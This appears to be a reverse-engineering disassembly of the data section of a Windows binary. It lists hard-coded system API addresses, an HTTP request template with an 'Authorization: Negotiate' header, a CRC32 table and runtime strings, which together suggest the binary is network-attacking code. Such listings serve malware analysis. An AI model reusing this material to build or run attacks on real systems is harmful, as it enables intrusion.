dword_4220D0 dd 77E7F01Ah ; DATA XREF: sub_4079D8+88�r
; sub_407B7F+55�r
dword_4220D4 dd 77E61A54h ; DATA XREF: sub_4079D8+56�r
; sub_407B7F+97�r
dword_4220D8 dd 77E7C3A5h ; DATA XREF: sub_4079D8+34�r
; sub_407B7F+2E�r
dword_4220DC dd 77E706B7h ; DATA XREF: sub_4079D8+15�r
; sub_407B7F+13�r ...
off_4220E0 dd offset sub_4DAF8C ; DATA XREF: sub_407E65+2�r
; sub_409288+FB�r ...
dword_4220E4 dd 77E76A60h ; DATA XREF: sub_40907B+2D�r
dword_4220E8 dd 77E71B14h ; DATA XREF: sub_409105+26�r
dword_4220EC dd 77E7166Fh ; DATA XREF: sub_409105+1D�r
off_4220F0 dd offset sub_4DB55B ; DATA XREF: sub_409140+69�r
off_4220F4 dd offset sub_4DB51C ; DATA XREF: sub_409140+36�r
off_4220F8 dd offset sub_4DB4A4 ; DATA XREF: sub_409140+25�r
dword_4220FC dd 77E7011Ah ; DATA XREF: sub_4091C2+96�r
dword_422100 dd 77E73CE2h ; DATA XREF: sub_4091C2+60�r
dword_422104 dd 77E61BB8h ; DATA XREF: sub_409288+17E�r
; sub_409BB2+F0�r ...
dword_422108 dd 77E70396h ; DATA XREF: sub_409288+126�r
; sub_40CB17+1B5�r ...
dword_42210C dd 77E6AD34h ; DATA XREF: sub_409288+35�r
; sub_40D2E0+3E60�r
dword_422110 dd 77E7FF65h ; DATA XREF: sub_409A5D+5A�r
dword_422114 dd 77EB7624h ; DATA XREF: sub_409A5D+3D�r
dword_422118 dd 77E79CE3h ; DATA XREF: sub_409BB2+91�r
; sub_414C7E+77�r
dword_42211C dd 77E79C90h ; DATA XREF: sub_409BB2+79�r
; sub_41358D+C�r ...
dword_422120 dd 77E7727Ah ; DATA XREF: sub_409BB2+3B�r
; sub_414B85+23�r
dword_422124 dd 77E7C657h ; DATA XREF: sub_409DD0+1D�r
; sub_409F1E+24�r ...
dword_422128 dd 77E76C1Ah ; DATA XREF: sub_409F1E+1CF�r
off_42212C dd offset sub_4DA0C8 ; DATA XREF: sub_40B105+478�r
; sub_40B9B9+DF�r ...
dword_422130 dd 77E79924h ; DATA XREF: sub_40C01E+13�r
; sub_41C829+20D�r ...
dword_422134 dd 77E77CCEh ; DATA XREF: sub_40C0F0+F�r
; sub_417AD9+54�r ...
dword_422138 dd 77E65F4Ch ; DATA XREF: sub_40CA59+34�r
; _0:00413ED8�r
dword_42213C dd 77E73628h ; DATA XREF: sub_40CB17+329�r
; sub_40D2E0+4AC7�r ...
dword_422140 dd 77E80656h ; DATA XREF: sub_40CB17+258�r
dword_422144 dd 77E6BD13h ; DATA XREF: sub_40CB17:loc_40CCD2�r
dword_422148 dd 77E79D5Bh ; DATA XREF: sub_40CB17+68�r
; sub_40CB17+2FF�r
dword_42214C dd 77E7C2C4h ; DATA XREF: sub_40CB17+61�r
dword_422150 dd 77E75CEBh ; DATA XREF: sub_40D2E0+4D3A�r
; sub_414A34+9F�r ...
dword_422154 dd 77E71AFEh ; DATA XREF: sub_40D2E0+3C5B�r
dword_422158 dd 77E616B4h ; DATA XREF: sub_4135F8+184�r
; sub_413887+1F�r ...
dword_42215C dd 77E76968h ; DATA XREF: sub_413B7C+5F�r
dword_422160 dd 77E7513Ch ; DATA XREF: _0:00413F6F�r
dword_422164 dd 77E6C29Dh ; DATA XREF: sub_41471A+1EB�r
dword_422168 dd 77E74C59h ; DATA XREF: sub_414A34+C7�r
dword_42216C dd 77EC7C51h ; DATA XREF: sub_414E09+5E�r
dword_422170 dd 77F6183Eh ; DATA XREF: sub_420B66�r
dword_422174 dd 77E76E3Dh ; DATA XREF: sub_416ACB+6C�r
; sub_41EBF2+38�r
dword_422178 dd 77E61608h ; DATA XREF: sub_416ACB+17�r
dword_42217C dd 77F5722Fh ; DATA XREF: sub_41756F+110�r
; sub_41756F+22D�r ...
dword_422180 dd 77E6177Ah ; DATA XREF: _0:00417DA3�r
; sub_41D6DF+59�r
dword_422184 dd 77E7C938h ; DATA XREF: _0:00417D78�r
dword_422188 dd 77E7C486h ; DATA XREF: _0:00417D2A�r
dword_42218C dd 77E7AC5Eh ; DATA XREF: sub_418CBC+54�r
dword_422190 dd 77E76E0Bh ; DATA XREF: sub_418E04+50�r
dword_422194 dd 77E7C726h ; DATA XREF: sub_418E04+11�r
dword_422198 dd 77E79E34h ; DATA XREF: sub_418ED4+240�r
; sub_4199A8+120�r ...
dword_42219C dd 77E7980Ah ; DATA XREF: sub_419506+76�r
; sub_4195B7+51�r ...
dword_4221A0 dd 77E73196h ; DATA XREF: sub_41EA0E+C�r
dword_4221A4 dd 77E6D706h ; DATA XREF: sub_41A160+215�r
; sub_420CE3+2E�r
dword_4221A8 dd 77F522F2h ; DATA XREF: sub_41B6C8+58�r
dword_4221AC dd 77E77405h ; DATA XREF: sub_41C829+5E�r
; sub_41C829+A7�r ...
dword_4221B0 dd 77E781F9h ; DATA XREF: sub_41C829+42�r
; sub_41C829+14D�r ...
dword_4221B4 dd 77E7849Fh ; DATA XREF: sub_41CA4D+48�r
; sub_41CC8C+14�r ...
dword_4221B8 dd 77E7A13Fh ; DATA XREF: sub_41CBE6+2F�r
dword_4221BC dd 77E6C703h ; DATA XREF: sub_41CBE6+1A�r
dword_4221C0 dd 77EB9A84h ; DATA XREF: sub_41D0CB+138�r
dword_4221C4 dd 77E9C5B1h ; DATA XREF: sub_41D5AD+11F�r
dword_4221C8 dd 77E7C9E1h ; DATA XREF: sub_41D5AD+CE�r
align 10h
dword_4221D0 dd 71AB12F8h ; DATA XREF: sub_404021+35�r
dword_4221D4 dd 71AB1836h ; DATA XREF: sub_404021+6E�r
; sub_40409E+8E�r
dword_4221D8 dd 71AB41DAh ; DATA XREF: sub_403A1B+47�r
; sub_404021+15�r
dword_4221DC dd 71AB3F8Dh ; DATA XREF: sub_403A1B+8D�r
dword_4221E0 dd 71AB1746h ; DATA XREF: sub_403A1B+B3�r
; sub_404021+41�r
dword_4221E4 dd 71AB3ECEh ; DATA XREF: sub_403A1B+C4�r
dword_4221E8 dd 71AB5DE2h ; DATA XREF: sub_403A1B+D8�r
dword_4221EC dd 71AB868Dh ; DATA XREF: sub_403A1B+180�r
dword_4221F0 dd 71AB5690h ; DATA XREF: sub_403A1B+1F0�r
dword_4221F4 dd 71AB1AF4h ; DATA XREF: sub_403161+12�r
; sub_403A1B+E4�r ...
dword_4221F8 dd 71AB1890h ; DATA XREF: sub_402FC3+4C�r
; sub_403A1B+115�r
dword_4221FC dd 71AB1B7Bh ; DATA XREF: sub_420B60�r
dword_422200 dd 71AB3C22h ; DATA XREF: sub_4018D0+59�r
; sub_40345C+AD�r ...
dword_422204 dd 71AB155Ah ; DATA XREF: sub_4018D0+70�r
; sub_403A1B+9D�r
dword_422208 dd 71AB3E5Dh ; DATA XREF: sub_4018D0+8C�r
; sub_404021+57�r
dword_42220C dd 71AB1A6Dh ; DATA XREF: sub_4018D0+AA�r
; sub_403A1B+241�r ...
dd 2 dup(0)
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_4033A1+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dbl_422258 dq 1.388888888888889e-2 ; DATA XREF: sub_4031B3+2F�r
dbl_422260 dq 1.666666666666667e-1 ; DATA XREF: sub_4031B3+15�r
dword_422268 dd 0FFFFFFFFh ; DATA XREF: sub_4031FF+16F�r
; sub_403631�r ...
align 10h
dbl_422270 dq 1.333333333333333 ; DATA XREF: sub_4031FF+79�r
dword_422278 dd 0 ; DATA XREF: sub_4033A1+4D�o
; sub_4036E1+5B�o ...
dword_42227C dd 0 ; DATA XREF: sub_40A832+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dd 0
dbl_422680 dq 9.765625e-4 ; DATA XREF: sub_40B105+2BD�r
; sub_40B105+2D8�r ...
dbl_422688 dq -3.0517578125e-5 ; DATA XREF: sub_4138BE+1E�r
dbl_422690 dq 1.0 ; DATA XREF: sub_415E4A+6C�r
; sub_415F93+6C�r ...
dword_422698 dd 0FFFFFFFFh, 417DDBh, 417DEFh ; DATA XREF: _0:00417D09�o
byte_4226A4 db 6 ; DATA XREF: sub_417F58:loc_417FAF�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: _2:off_42F35C�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: _2:off_42F358�o
align 4
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_418CBC+8E�o
align 10h
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_418CBC+4F�o
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: _2:off_4315AC�o
align 10h
dbl_422800 dq 0.0 ; DATA XREF: sub_41A413+8C�r
; sub_41A413+AC�r ...
dbl_422808 dq 4.195835e6 ; DATA XREF: sub_41A928+F�r
dbl_422810 dq 3.145727e6 ; DATA XREF: sub_41A928+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41A966+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41A966�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_41AA8D+93�o
align 4
dword_422848 dd 0FFFFFFFFh, 41B178h, 41B182h, 0 ; DATA XREF: sub_41B111+5�o
dword_422858 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41B240+5�o
dd offset loc_41B2FE
align 8
dd offset sub_41B2DC
dd offset sub_41B2E6
dword_422870 dd 0FFFFFFFFh, 41B52Eh, 41B532h, 0 ; DATA XREF: sub_41B376+5�o
dword_422880 dd 0FFFFFFFFh, 41B590h, 41B599h, 0 ; DATA XREF: sub_41B53A+5�o
dword_422890 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41B61C+5�o
dd offset loc_41B66D
align 10h
dd offset loc_41B659
dd offset loc_41B65D
dword_4228A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41B672+5�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0B6h, 41h, 0
align 8
dd offset loc_41B6AF
dd offset loc_41B6B3
dword_4228C0 dd 2 dup(0) ; DATA XREF: sub_41C829+36�o
; sub_41DC83+39�o ...
dword_4228C8 dd 0FFFFFFFFh, 41C939h, 41C93Dh, 0FFFFFFFFh, 41C9EDh, 41C9F1h
; DATA XREF: sub_41C829+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: _2:off_4319EC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D9A5+119�o
align 10h
asc_422B90 db 0Ah ; DATA XREF: sub_41D9A5+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D9A5+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41D9A5+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D9A5+7D�o
align 10h
dword_422BD0 dd 0FFFFFFFFh, 41DD7Ch, 41DD80h ; DATA XREF: sub_41DC83+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_41EBF2+A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41F17E+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41F17E+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41F17E+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41FAC8:loc_41FBBD�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41FAC8+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41FAC8+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41FAC8+AD�o
align 10h
dword_422C70 dd 0FFFFFFFFh, 4204C0h, 4204C4h, 0FFFFFFFFh, 42052Fh, 420533h
; DATA XREF: sub_420309+5�o
dd 422DACh
off_422C8C dd offset loc_4208F2 ; DATA XREF: sub_4208CA+8�o
; sub_42090E+2C�o ...
dd offset sub_4208E5
dd offset sub_420B06
dd offset dword_422DF8
off_422C9C dd offset sub_42095C ; DATA XREF: sub_42090E+3A�o
; sub_420978�o ...
dd offset sub_4208E5
dd offset loc_420B42
dword_422CA8 dd 0 ; DATA XREF: sub_42090E+16�o
; sub_4209E0+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_420983+11�o
dd offset dword_422E44
off_422CC8 dd offset sub_420A6B ; DATA XREF: sub_420A87�o
; sub_420AAA+37�o ...
dd offset sub_4208E5
dd offset loc_420B24
aStringTooLong db 'string too long',0 ; DATA XREF: sub_420AAA+11�o
dd offset dword_422E88
off_422CE8 dd offset loc_420C01 ; DATA XREF: sub_420BEC�o
; _2:off_43210C�o ...
dd offset dword_422EB8
off_422CF0 dd offset loc_420C1D ; DATA XREF: sub_420C39+8�o
; sub_420C76+8�o ...
dd offset sub_420CD6
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_420CD6+7�o
align 10h
dword_422D10 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_420CE3+E�o
dd 3, 19930520h, 2 dup(0)
dword_422D30 dd 0FFFFFFFFh, 420E94h, 420E98h, 0FFFFFFFFh, 420F11h, 420F15h
; DATA XREF: sub_420D92+5�o
dword_422D48 dd 0FFFFFFFFh, 421109h, 42110Dh, 0FFFFFFFFh, 421166h, 42116Ah
; DATA XREF: sub_42101D+5�o
dd 43210Ch, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_422D78 dd offset off_432124 ; DATA XREF: _1:00422D90�o _1:00422DDC�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_422D78
dd offset dword_422D48+18h
dword_422D98 dd 3 dup(0) ; DATA XREF: _1:00422DBC�o
dd 2, 422D90h, 3 dup(0)
dd offset off_432124
dd offset dword_422D98+4
off_422DC0 dd offset off_432144 ; DATA XREF: _1:00422DD8�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_422DC0
dd offset off_422D78
dd offset dword_422D48+18h
dd 0
db 0 ; DATA XREF: _1:00422E08�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 422DD8h
dword_422DF8 dd 3 dup(0) ; DATA XREF: _1:00422C98�o
dd offset off_432144
dd offset unk_422DE8
off_422E0C dd offset off_432164 ; DATA XREF: _1:00422E24�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_422E0C
dd offset off_422D78
dd offset dword_422D48+18h
dword_422E30 dd 3 dup(0) ; DATA XREF: _1:00422E54�o
dd 3, 422E24h
dword_422E44 dd 3 dup(0) ; DATA XREF: _1:00422CC4�o
dd offset off_432164
dd offset dword_422E30+4
off_422E58 dd offset off_432188 ; DATA XREF: _1:00422E70�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_422E58
dd 0
db 0 ; DATA XREF: _1:00422E98�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 422E70h
dword_422E88 dd 3 dup(0) ; DATA XREF: _1:00422CE4�o
dd offset off_432188
dd offset unk_422E78
dd offset dword_422D48+18h
dword_422EA0 dd 4 dup(0) ; DATA XREF: _1:00422EC8�o
dd 1, 422E9Ch
dword_422EB8 dd 3 dup(0) ; DATA XREF: _1:00422CEC�o
dd offset off_43210C
dd offset dword_422EA0+8
align 10h
dword_422ED0 dd 19930520h, 2, 422EF0h, 5 dup(0) ; DATA XREF: _0:loc_421203�o
dd 0FFFFFFFFh, 4211ECh, 0
dd offset sub_4211E4
dword_422F00 dd 19930520h, 2, 422F20h, 5 dup(0) ; DATA XREF: _0:loc_421220�o
dd 0FFFFFFFFh, 421210h, 0
dd offset loc_421218
dword_422F30 dd 19930520h, 2, 422F50h, 1, 422F60h, 3 dup(0) ; DATA XREF: _0:loc_42122C�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 422F78h, 4 dup(0)
dd offset loc_40394B
dd 0FFFFFFFFh, 421236h
dword_422F90 dd 19930520h, 1, 422F88h, 5 dup(0) ; DATA XREF: _0:loc_42123E�o
dd offset off_43210C
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 420C76h, 0
dd offset off_432124
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 420A28h, 0
dd offset off_432144
align 10h
dd 0FFFFFFFFh, 0
dword_422FF8 dd 1Ch, 420A92h, 3, 422FE4h, 422FC8h, 422FACh ; DATA XREF: _1:0042301C�o
dword_423010 dd 0 ; DATA XREF: sub_420983+2E�o
; sub_420B06+4B�o
dd offset sub_420978
dd 0
dd offset dword_422FF8+8
dd 0FFFFFFFFh, 421248h
dword_423028 dd 19930520h, 1, 423020h, 4 dup(0) ; DATA XREF: _0:loc_421250�o
dd 0FFFFFFFFh, 42125Ah
dword_42304C dd 19930520h, 1, 423044h, 4 dup(0) ; DATA XREF: _0:loc_421262�o
dd 0FFFFFFFFh, 42126Ch
dword_423070 dd 19930520h, 1, 423068h, 5 dup(0) ; DATA XREF: _0:loc_421274�o
dd offset off_432164
align 8
dd 0FFFFFFFFh, 0
dword_4230A0 dd 1Ch, 420AEEh, 3, 42308Ch, 422FC8h, 422FACh ; DATA XREF: _1:004230C4�o
dword_4230B8 dd 0 ; DATA XREF: sub_420AAA+2E�o
; sub_420B06+2D�o
dd offset sub_420A87
dd 0
dd offset dword_4230A0+8
dd 0FFFFFFFFh, 42127Eh
dword_4230D0 dd 19930520h, 1, 4230C8h, 4 dup(0) ; DATA XREF: _0:loc_421286�o
dword_4230EC dd 2, 422FC8h, 422FACh ; DATA XREF: _1:00423104�o
dword_4230F8 dd 0 ; DATA XREF: sub_420B06+F�o
; ---------------------------------------------------------------------------
retf 4208h
; ---------------------------------------------------------------------------
align 10h
dd 0
dd offset dword_4230EC
dd 23314h, 0FFFFFFFEh, 0
dd 23358h, 221D0h, 23144h, 0FFFFFFFEh, 0
dd 23BA8h, 22000h, 5 dup(0)
dd 236DCh, 23B8Eh, 23B7Ch, 23B6Ah, 23B5Ah, 23B4Ah, 23B3Ah
dd 23B1Ch, 23B08h, 23AF8h, 23AE6h, 23AD4h, 23AC6h, 23AB6h
dd 23AA4h, 23A8Ah, 23A72h, 23364h, 23372h, 23382h, 2339Ch
dd 233B8h, 233C0h, 233D6h, 233E6h, 233FCh, 2340Eh, 23420h
dd 23430h, 23440h, 2344Eh, 2345Ch, 2346Ah, 23480h, 2348Ch
dd 234A4h, 234BEh, 234CEh, 234E0h, 234ECh, 234FEh, 23516h
dd 2352Eh, 23556h, 2356Eh, 2357Ah, 23588h, 235A2h, 235B4h
dd 235C4h, 235D0h, 235DCh, 235EEh, 23600h, 23614h, 23624h
dd 23632h, 23646h, 23658h, 23668h, 23676h, 23688h, 23698h
dd 236AEh, 236BCh, 236CAh, 236F8h, 2370Eh, 2371Eh, 23734h
dd 23744h, 23756h, 2376Ah, 23778h, 23788h, 2379Eh, 237ACh
dd 237C2h, 237D8h, 237ECh, 237FAh, 23810h, 2381Ch, 23832h
dd 23842h, 23854h, 23860h, 23874h, 2388Ch, 2389Eh, 238B2h
dd 238CCh, 238E8h, 238F4h, 2390Eh, 2391Eh, 2392Ch, 2393Eh
dd 23950h, 2395Eh, 23978h, 23986h, 23994h, 239A2h, 239B2h
dd 239C2h, 239D4h, 239E0h, 239F0h, 23A00h, 23A0Ch, 23A16h
dd 23A22h, 23A3Eh, 23A58h, 0
dd 8000000Bh, 80000074h, 80000073h, 80000015h, 80000009h
dd 80000002h, 8000000Dh, 80000001h, 80000010h, 80000013h
dd 80000012h, 80000097h, 80000017h, 8000000Ah, 80000004h
dd 80000003h, 0
dd 5F325357h, 642E3233h, 6C6Ch, 784500BAh, 68547469h, 64616572h
dd 1DF0000h, 54746547h, 436B6369h, 746E756Fh, 2A30000h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 0A4h ;
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db 56h ; V
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0C1h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 173h
aGetlocaltime db 'GetLocalTime',0
align 2
dw 17Dh
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 4
dd 654701E0h, 6D695474h, 726F4665h, 4174616Dh, 1470000h
dd 44746547h, 46657461h, 616D726Fh, 4174h, 65470171h, 73614C74h
dd 72724574h, 726Fh, 7243006Fh, 65746165h, 65726854h, 6461h
dd 6C430034h, 4865736Fh, 6C646E61h, 1630065h, 46746547h
dd 53656C69h, 657A69h, 72430053h, 65746165h, 656C6946h
dd 15E0041h
aGetfileattri_2 db 'GetFileAttributesA',0
align 10h
db '',0
aFindclose_0 db 'FindClose',0
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 4
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfile_0 db 'FindNextFileA',0
db '',0
aFindfirstfil_0 db 'FindFirstFileA',0
align 10h
dd 655202B5h, 69466461h, 656Ch, 6553031Bh, 6C694674h, 696F5065h
dd 7265746Eh, 2510000h
aLeavecritica_0 db 'LeaveCriticalSection',0
align 2
aS_1 db '',0
aEntercritica_0 db 'EnterCriticalSection',0
align 2
dw 224h
aInitializecr_0 db 'InitializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritic_0 db 'DeleteCriticalSection',0
dw 3A4h
aWritefile_0 db 'WriteFile',0
dw 0F8h
aFreelibrary_0 db 'FreeLibrary',0
db 59h ; Y
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 1A0h
aGetprocaddre_0 db 'GetProcAddress',0
align 4
db 52h ; R
